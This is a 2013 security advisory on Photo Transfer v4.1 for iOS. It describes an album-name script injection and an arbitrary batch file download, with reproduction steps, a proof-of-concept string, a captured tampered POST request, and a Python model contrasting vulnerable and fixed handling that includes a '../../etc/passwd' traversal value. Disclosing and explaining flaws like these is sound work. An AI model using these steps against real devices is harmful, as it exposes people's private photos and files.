Document Title:
===============
Photo Transfer v4.1 iOS - Multiple Web Vulnerabilities


Date:
=====
2013-04-23


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=933


VL-ID:
=====
933


Common Vulnerability Scoring System:
====================================
6


Introduction:
=============
Photo Transfer is the easiest way to transfer photos and videos to and from your iPhone, iPad, iPad mini and iPod touch. This app not only lets you download photos or videos from your iPhone or iPad to your computer easily, but also exchange photos between your other devices and your iPad, iPhone or iPod touch. No USB or extra software is needed.

- Easy - Easily download multiple photos from your iPad, iPhone or iPod touch to your computer (Windows and Mac)
- Useful - Exchange photos and videos between multiple iPhone, iPad or iPod touch devices
- Convenient - Select multiple photos or videos to transfer at one time and transfer them from device to computer or device to device
- Original - Transfer photos & videos in full resolution; photos are not reduced in quality as with other apps
- Shortcut - Transfer photos between devices over Wifi
- Modern - No USB or extra software required
- Widely - Works with computers running Windows, Mac and Linux
- Safe - Your photos and videos are transferred directly from device to device using your local wifi network. They are not stored on an external server and they never leave your local wifi network
- Economical - Pay only ONCE to install this app on your iPhone and iPad (as long as the same iTunes account is used on both devices)

* Upload photos and videos from your computer to your iPad, iPhone or iPod touch - photos are saved to the Saved Photos album
* To transfer photos from one iPhone/iPad to another, both devices need not have this app installed; the device's browser can be used to download or upload media.
* Access to a properly configured wifi network is required for this application to work.
Some public or private wifi networks may be configured to block communication between devices, preventing the transfer connection from being established.

(Copy of the Homepage: https://itunes.apple.com/de/app/photo-transfer-lite-wifi/id606113043 )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the mobile Photo Transfer v4.1 app for the Apple iPad & iPhone.


Report-Timeline:
================
2013-04-24: Public Disclosure


Status:
========
Published


Affected Products:
==================
Apple AppStore
Product: Photo Transfer iOS v4.1


Exploitation-Technique:
=======================
Remote


Severity:
=========
High


Details:
========
1.1
A local command injection web vulnerability has been detected in the mobile Photo Transfer v4.1 app for the Apple iPad & iPhone.
The vulnerability allows an attacker to inject code through a system value (the album name) that the application reads from the device and writes into its web interface.

The vulnerability is located in the index module, where the iPad or iPhone album folder names are loaded for the main album listing. A local attacker can rename an iPad or iPhone photo album to a string carrying script code or path requests; the injected value is rendered when another user opens the main index album listing served by the application's web server. The name value is written into the album-name web context without encoding, so markup contained in the name is interpreted by the browser instead of being shown as text.

Exploitation of the web vulnerability does not require a privileged application user account (a standard account is sufficient) or user interaction beyond a user opening the album listing. Successful exploitation results in unauthorized execution of the injected code and path requests in the context of the application's web interface.

Vulnerable Application(s):
				[+] Photo Transfer v4.1 - iTunes or AppStore (Apple)

Vulnerable Parameter(s):
				[+] path/folder name

Affected Module(s):
				[+] Index Listing - Album


1.2
An arbitrary file download vulnerability has been detected in the mobile Photo Transfer v4.1 app for the Apple iPad & iPhone.
The vulnerability allows remote attackers to download, via a manipulated POST request, files from the affected web server's file system that were not authorized for download.

The vulnerability is located in the `ibatchdownload` module. When a batch download is processed, the server builds the archive from the `selected_files` values of the POST request without checking that those files are the ones the user actually selected and is allowed to see. A remote attacker can replace the file names in the `selected_files` value of the POST request with the names of other pictures and capture them without authorization by downloading the resulting archive.

Exploitation of the arbitrary file download vulnerability requires neither user interaction nor a privileged user account. Successful exploitation results in information disclosure: unauthorized access to and download of photo files from the device's web server.

Vulnerable Application(s):
				[+] Photo Transfer v4.1 - iTunes or AppStore (Apple)

Vulnerable Module(s):
				[+] ibatchdownload

Vulnerable Parameter(s):
				[+] selected_files


Proof of Concept:
=================
1.1
The local command injection web vulnerability can be exploited by remote attackers without a privileged application user account and without user interaction.
For demonstration or to reproduce ...

Manual steps to reproduce ... Command Injection via Album Folder Name

1. Install the application from iTunes or directly from the AppStore
2. Open the service and make the web server available via http
3. Now open your iPhone or iPad device to sync
4. Open the standard albums in Photos on your device (iPhone or iPad)
5. Change the name of one of your standard albums to a path/command injection string (see the PoC string below)
6. From another device, access the index listing of the application after the album sync
7. The code is executed from the main album `name` listing context
8. Successfully reproduced ...!

PoC: Wifi Album Easy Photo Transfer Tools >%20>"

Note: the PoC string is URL-encoded (`%20` is a space); decoded it ends in `> >"`. The closing angle bracket and the double quote terminate the surrounding HTML tag or attribute in the listing, so anything that follows them in the album name is rendered as markup rather than as text. That the browser interprets it at all is the defect: the album name is a device-controlled value and must be HTML-encoded before it is written into the page.

1.2
The arbitrary file download vulnerability can be exploited by remote attackers without a privileged application user account and without user interaction.
For demonstration or to reproduce ...
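Before the manual steps for 1.2, the following Python model shows both weaknesses beside hardened handling. It is an added illustration, not code from the Photo Transfer app (whose server-side code is not public): the album data, the in-memory photo store, the `/i/album/<id>/0/30` link template (taken from the Referer in the captured request) and the constructed POST body are assumptions. It renders the PoC album name `>%20>"` with and without HTML encoding, and processes a `selected_files` value modelled on the batch-download request reproduced below, once as the advisory describes the server (every existing file named in the request is zipped) and once restricted to the files of the album the request refers to.

```python
"""Model of the two Photo Transfer web-interface weaknesses and their fixes.

Added example, not code from the Photo Transfer app: its server-side code is
not public, so album data, storage, link template and POST body are assumed.
"""
import html
import io
import urllib.parse
import zipfile
from dataclasses import dataclass, field


@dataclass
class Album:
    """Constructed album record: id used in the listing link, name shown in
    the listing, and the file names that belong to this album."""
    album_id: int
    name: str
    files: set = field(default_factory=set)


# Hypothetical in-memory photo store: file name -> bytes (constructed).
STORAGE = {
    "IMG_0226.JPG": b"camera-roll-photo-226",
    "IMG_0245.JPG": b"camera-roll-photo-245",
    "IMG_0171.PNG": b"private-screenshot-171",
}
# Two constructed albums; IMG_0171.PNG is only in the second one.
ALBUMS = [
    Album(1, "Camera Roll", {"IMG_0226.JPG", "IMG_0245.JPG"}),
    Album(2, "Private", {"IMG_0171.PNG"}),
]

# The advisory's PoC album name, URL-decoded as the device would store it.
POC_ALBUM_NAME = urllib.parse.unquote('>%20>"')


def render_index(albums, escape=True):
    """Build the main album listing. With escape=False the album name is
    written straight into the HTML (weakness 1.1): a name of '> >"' ends
    the title attribute and the tag, so the rest becomes markup."""
    rows = []
    for a in albums:
        name = html.escape(a.name, quote=True) if escape else a.name
        rows.append(
            f'<li><a href="/i/album/{a.album_id}/0/30" title="{name}">{name}</a></li>'
        )
    return "<ul>" + "".join(rows) + "</ul>"


def parse_selected_files(body):
    """Parse the selected_files form field (URL-encoded, comma separated,
    trailing comma allowed, as in the captured request) into file names."""
    fields = urllib.parse.parse_qs(body, keep_blank_values=True)
    raw = fields.get("selected_files", [""])[0]
    return [n.strip() for n in raw.split(",") if n.strip()]


def batch_download_vulnerable(body):
    """Weakness 1.2 as the advisory describes it: every requested name that
    exists in storage is zipped, whatever album the caller is looking at."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in parse_selected_files(body):
            if name in STORAGE:
                zf.writestr(name, STORAGE[name])
    return buf.getvalue()


def authorize_batch(requested, album):
    """Hardened selection: keep only plain file names that belong to the
    album the request refers to; return the rejected ones for logging."""
    allowed, rejected = [], []
    for name in requested:
        has_path_chars = any(c in name for c in "/\\") or ".." in name
        if has_path_chars or name not in album.files:
            rejected.append(name)
        else:
            allowed.append(name)
    return allowed, rejected


def batch_download_fixed(body, album):
    """Same endpoint with the membership check applied before zipping."""
    allowed, _ = authorize_batch(parse_selected_files(body), album)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name in allowed:
            zf.writestr(name, STORAGE[name])
    return buf.getvalue()


def zip_names(data):
    """Sorted member names of an in-memory zip, for inspecting the result."""
    return sorted(zipfile.ZipFile(io.BytesIO(data)).namelist())


# Constructed POST body modelled on the advisory's capture: the caller is in
# album 1 but also names IMG_0171.PNG from album 2 and a traversal string.
POC_BODY = "selected_files=" + urllib.parse.quote(
    "IMG_0226.JPG,IMG_0171.PNG,../../etc/passwd,IMG_0245.JPG,", safe=""
) + "&selected_size=1"

if __name__ == "__main__":
    print(render_index([Album(3, POC_ALBUM_NAME)], escape=False))
    print(render_index([Album(3, POC_ALBUM_NAME)]))
    print(zip_names(batch_download_vulnerable(POC_BODY)))
    print(zip_names(batch_download_fixed(POC_BODY, ALBUMS[0])))
```

Running it shows the unescaped listing carrying the raw `"` and `>` into the title attribute while the escaped one shows `&gt; &gt;&quot;`; the vulnerable batch handler returns all three stored files, the fixed one only the two that belong to album 1 and reports the other names so they can be logged. The traversal name is included to show that an allow-list check against the album's own file set also covers the obvious path escape, which the advisory does not test.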
Manual steps to reproduce ... Arbitrary File Download (File Include)

1. Start your session tamper tool or Wireshark on your computer
2. Install the application on the iPad or iPhone device
3. Start tampering the http session, or filter the http packets in Wireshark
4. Start the application on your iPad or iPhone and start the web server
5. Open the application from an external device (computer > browser)
6. Now trigger "Download All" and hold the request in the tamper tool, or record the packet for a second request
7. Replace one of the selected image names in `selected_files` with the name of a restricted image (one that was not selected or shared) and send the same request again with the exchanged values
8. The server compresses all of the manipulated, non-selected images into a compressed images.zip archive for download
9. The remote attacker downloads the archive and extracts the pictures that the batch downloader included without authorization

Note on the capture: the `selected_files` value is URL-encoded, so `%2C` is the comma separating file names; the placeholder `[ARBITRARY FILE DOWNLOAD VULNERABILITY!]` marks the position where the exchanged file name goes. The URL line shows localhost while the Host header carries the device address 192.168.2.104:8080.

--- REQUEST & POST METHOD ---
12:38:17.408[31919ms][total 31919ms] Status: 200[OK]
POST http://localhost:8080/i/batchdownload/images.zip
Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[107472854] Mime Type[application/x-unknown-content-type]
   Request Headers:
      Host[192.168.2.104:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[en-US,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      DNT[1]
      Referer[http://localhost:8080/i/album/2/0/30]
      Connection[keep-alive]
   Post Data:
      selected_files[IMG_13373117.JPG%2CIMG_[ARBITRARY FILE DOWNLOAD VULNERABILITY!].JPG%2CIMG_0245.JPG%2CIMG_0244.JPG%2C
      IMG_0243.JPG%2CIMG_0242.JPG%2CIMG_0241.JPG%2CIMG_0240.JPG%2CIMG_0239.JPG%2CIMG_0238.JPG%2CIMG_0237.JPG%2CIMG_0236.JPG
      %2CIMG_0235.JPG%2CIMG_0234.JPG%2CIMG_0233.JPG%2CIMG_0232.JPG%2CIMG_0231.JPG%2CIMG_0230.JPG%2CIMG_0229.JPG%2CIMG_0228.JPG
      %2CIMG_0227.JPG%2CIMG_0226.JPG%2CIMG_0183.PNG%2CIMG_0182.PNG%2CIMG_0181.PNG%2CIMG_0179.PNG%2CIMG_0174.PNG
      %2CIMG_0173.PNG%2CIMG_0172.PNG%2CIMG_0171.PNG%2C]
      selected_size[1]
   Response Headers:
      Accept-Ranges[bytes]
      Content-Length[107472854]
      Date[Thu, 18 Apr 2013 10:40:21 GMT]

Reference(s):
http://localhost:8080/i/album/2/0/30  (Download All *.zip)


Risk:
=====
1.1
The security risk of the local command injection web vulnerability is estimated as high(-).

1.2
The security risk of the file include / arbitrary file download vulnerability is estimated as high(+).


Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)


Disclaimer:
===========
The information provided in this advisory is provided as is, without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental or consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses or policies, deface websites, hack into databases or trade with fraudulent/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by the Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material, contact admin@vulnerability-lab.com or support@vulnerability-lab.com to get permission.

Copyright © 2013 | Vulnerability Laboratory